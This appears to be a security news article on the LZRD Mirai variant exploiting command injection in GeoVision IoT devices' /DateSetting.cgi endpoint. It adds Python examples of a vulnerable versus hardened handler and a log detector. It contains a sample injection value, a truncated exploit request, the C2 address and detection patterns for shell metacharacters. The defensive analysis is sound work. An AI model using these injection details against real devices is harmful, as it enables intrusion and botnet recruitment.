Mirai Botnet Actively Exploiting GeoVision IoT Devices Command Injection Vulnerabilities

The cybersecurity landscape has once again been disrupted by the resurgence of the notorious Mirai botnet, which has been actively exploiting command injection vulnerabilities in discontinued GeoVision Internet of Things (IoT) devices.
This latest campaign leverages two critical vulnerabilities, CVE-2024-6047 and CVE-2024-11120, disclosed in June and November 2024 respectively; no exploitation of either had been reported publicly until recently.
The vulnerabilities allow unauthenticated remote attackers to inject and execute arbitrary system commands on targeted systems, providing a gateway for malware propagation.
Although the vulnerabilities have been known for nearly a year, technical details were sparse and there were no public records of active exploitation until now.
That lack of detail may have contributed to the flaws remaining unpatched on many deployed devices, leaving attackers a ready target.
The exploit targets the /DateSetting.cgi endpoint on GeoVision IoT devices, injecting commands through the szSrvIpAddr parameter, which the device does not filter before using it in a system command.
The scope of this threat is particularly concerning as it affects numerous discontinued GeoVision IoT devices that will not receive security updates or patches.
The situation exemplifies a persistent problem in the IoT industry where older, unsupported devices remain deployed in production environments, creating an expanding attack surface for threat actors.
Organizations utilizing these devices now face the difficult decision of either accepting the risk or decommissioning functional hardware due to security concerns.
Akamai researchers identified this malicious activity in early April 2025 through their global network of honeypots.
After thorough investigation, they attributed the attacks to a Mirai-based malware variant called LZRD, which has been observed targeting multiple vulnerabilities beyond just the GeoVision devices, including previously reported DigiEver vulnerabilities.
Infection Mechanism Analysis
The infection begins with a crafted HTTP request to a vulnerable GeoVision device's /DateSetting.cgi endpoint.
The payload injects commands through the szSrvIpAddr parameter:
/DateSetting.cgi dwTimeZone=2&dwGainType=0&szSrvIpAddr=time.
On success, the injected commands download and execute an ARM Mirai binary named “boatnet,” a name commonly used by Mirai variants.
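The injection pattern described above, as an added illustration that is not GeoVision's firmware or Akamai's code: a hypothetical DateSetting.cgi-style handler shown in its vulnerable form (the parameter interpolated into a shell line) and in a hardened form (allow-list validation plus an argv list, no shell). The parameter names come from the article; the ntpdate command, the function names and the integer bounds are assumptions.

```python
"""Hypothetical DateSetting.cgi-style handler (illustration, not GeoVision code).
Assumptions: the device hands szSrvIpAddr to an NTP client (ntpdate is a stand-in)
through a shell, and the bounds used for dwTimeZone/dwGainType are placeholders."""
import ipaddress
import re
from urllib.parse import unquote_plus

# RFC 1123 label: 1-63 alphanumerics/hyphens, no leading or trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}")


def parse_query(query):
    """Split a CGI query string into single-valued fields (decodes %XX and '+')."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def time_sync_command_vulnerable(params):
    """Vulnerable pattern: the unchecked value is interpolated into a shell line.

    Returns the string a system()-style call would hand to /bin/sh -c, so the
    effect of a metacharacter is visible without executing anything.
    """
    return "ntpdate -u " + params.get("szSrvIpAddr", "")


def validate_server(value):
    """Allow-list: an IPv4/IPv6 literal or an RFC 1123 hostname, nothing else."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if 0 < len(value) <= 253 and _HOSTNAME_RE.fullmatch(value):
        return value
    raise ValueError("rejected szSrvIpAddr: %r" % value)


def is_valid_server(value):
    """Boolean wrapper around validate_server for callers that only need yes/no."""
    try:
        validate_server(value)
        return True
    except ValueError:
        return False


def validate_int(value, lo, hi):
    """Numeric fields: decimal only, within placeholder bounds."""
    number = int(value, 10)          # ValueError on anything non-decimal
    if not lo <= number <= hi:
        raise ValueError("out of range: %d" % number)
    return number


def time_sync_command_hardened(params):
    """Hardened pattern: validate every field, then build an argv list.

    Run it with subprocess.run(argv, shell=False); the server value is passed as
    one argument, so shell metacharacters in it have no meaning.
    """
    server = validate_server(params.get("szSrvIpAddr", ""))
    validate_int(params.get("dwTimeZone", "0"), -12, 14)
    validate_int(params.get("dwGainType", "0"), 0, 1)
    return ["ntpdate", "-u", server]


if __name__ == "__main__":
    # Constructed inputs; the second is a generic injection, not the campaign's payload.
    benign = parse_query("dwTimeZone=2&dwGainType=0&szSrvIpAddr=pool.ntp.org")
    hostile = parse_query("dwTimeZone=2&dwGainType=0&szSrvIpAddr=pool.ntp.org%3Bid")
    print(time_sync_command_vulnerable(hostile))  # ntpdate -u pool.ntp.org;id
    print(time_sync_command_hardened(benign))     # ['ntpdate', '-u', 'pool.ntp.org']
    try:
        time_sync_command_hardened(hostile)
    except ValueError as exc:
        print("blocked:", exc)
```

The allow-list is the important part: a deny-list of metacharacters is easy to bypass with encodings the shell understands, whereas "is this an IP literal or a hostname" is a closed question, and passing the value as a single argv element means even an accepted string cannot be reinterpreted by a shell.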
The LZRD variant can be distinguished by the unique string it prints to the target machine’s console upon execution:
root@ubuntu2404-amd64-20250307-en-5:~# lzrd cock fest"/proc/"/e
The malware contains the usual Mirai attack functions, including UDP and TCP flood capabilities.
Researchers identified the following attack methods in the code:
sym.attack_udp_plain
sym.attack_get_opt_ip
sym.attack_tcp_ack
sym.attack_method_nfo
sym.attack_method_raw
sym.attack_method_hexflood
sym.attack_method_tcp
sym.attack_method_udphex
sym.attack_udp_custom
sym.attack_tcp_stomp
sym.attack_method_tcpxmas
Further analysis revealed a hard-coded command and control (C2) IP address (198.23.212.246) embedded in the sym.resolve_cnc_addr() function, providing a direct line of communication between infected devices and the attackers’ infrastructure.
This C2 server displays a distinctive banner message similar to the previously reported InfectedSlurs/TBOTNET botnet, suggesting possible connections or code reuse between these malicious campaigns.
To protect against this threat, organizations should identify and replace vulnerable GeoVision devices; where that cannot happen immediately, keep their management interface off the internet, segment them from the rest of the network, and monitor for requests to /DateSetting.cgi carrying shell metacharacters in szSrvIpAddr and for connections to the command and control address identified above.
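A log triage routine for the two indicators the article gives (the /DateSetting.cgi plus szSrvIpAddr injection pattern, and the hard-coded C2 address), as an added example that is not Akamai's or any vendor's tooling. The endpoint, parameter name and C2 address come from the article; the log formats, the sample lines and the function names are constructed, and the example assumes the parameters were logged in the query string (a POST body would need request-body logging).

```python
"""Triage of device access logs and outbound-connection logs for the GeoVision
exploitation pattern and the LZRD C2 address.  Log formats and sample lines are
constructed for this example."""
import re
from urllib.parse import unquote_plus

C2_ADDR = "198.23.212.246"          # hard-coded C2 from the Akamai analysis
ENDPOINT = "/DateSetting.cgi"
# Characters that have no place in a host name but do in a shell command line.
SHELL_META = set(";|&$`(){}<>\n\r'\"\\ \t")

_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
_PARAM_RE = re.compile(r"(?:^|[?&])szSrvIpAddr=([^&\s]*)")
_CONN_RE = re.compile(r"\bdst=(\S+)")


def suspicious_server_value(raw):
    """True if the URL-decoded szSrvIpAddr value carries shell metacharacters."""
    return any(c in SHELL_META for c in unquote_plus(raw))


def triage_http(line):
    """Classify one combined-format access-log line; None if not of interest."""
    m = _REQ_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.endswith(ENDPOINT):
        return None
    p = _PARAM_RE.search(query)
    if p and suspicious_server_value(p.group(1)):
        return ("high", "command-injection attempt on %s: szSrvIpAddr=%r"
                % (ENDPOINT, unquote_plus(p.group(1))))
    return ("info", "%s request without injection markers" % ENDPOINT)


def triage_conn(line):
    """Flag any connection-log line whose destination is the known C2 address."""
    m = _CONN_RE.search(line)
    if m and m.group(1) == C2_ADDR:
        return ("high", "outbound connection to LZRD C2 %s" % C2_ADDR)
    return None


def triage(lines):
    """Return (index, severity, message) for every line that produced a finding."""
    findings = []
    for i, line in enumerate(lines):
        finding = triage_http(line) or triage_conn(line)
        if finding:
            findings.append((i, finding[0], finding[1]))
    return findings


# Constructed sample lines (RFC 5737 addresses); line 1 carries a generic
# ';id' injection, not the campaign's actual payload.
SAMPLE_LINES = [
    '10.0.5.21 - - [03/Apr/2025:10:01:22 +0000] "GET /DateSetting.cgi?dwTimeZone=2&dwGainType=0&szSrvIpAddr=pool.ntp.org HTTP/1.1" 200 512',
    '203.0.113.7 - - [03/Apr/2025:10:02:01 +0000] "GET /DateSetting.cgi?dwTimeZone=2&dwGainType=0&szSrvIpAddr=pool.ntp.org%3Bid HTTP/1.1" 200 512',
    '10.0.5.21 - - [03/Apr/2025:10:03:15 +0000] "GET /index.html HTTP/1.1" 200 2048',
    "2025-04-03T10:02:05Z conn src=10.0.5.40 dst=198.23.212.246 proto=tcp",
    "2025-04-03T10:02:06Z conn src=10.0.5.40 dst=198.51.100.9 proto=tcp",
]

if __name__ == "__main__":
    for index, severity, message in triage(SAMPLE_LINES):
        print(index, severity, message)
```

Decoding the parameter before inspecting it matters: a percent-encoded semicolon passes a naive string match on the raw request line but is exactly what the device's CGI sees after decoding. The "info" finding for benign DateSetting.cgi hits is deliberate, since on a discontinued device any unexpected caller of that endpoint is worth a look.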
The post Mirai Botnet Actively Exploiting GeoVision IoT Devices Command Injection Vulnerabilities appeared first on Cyber Security News.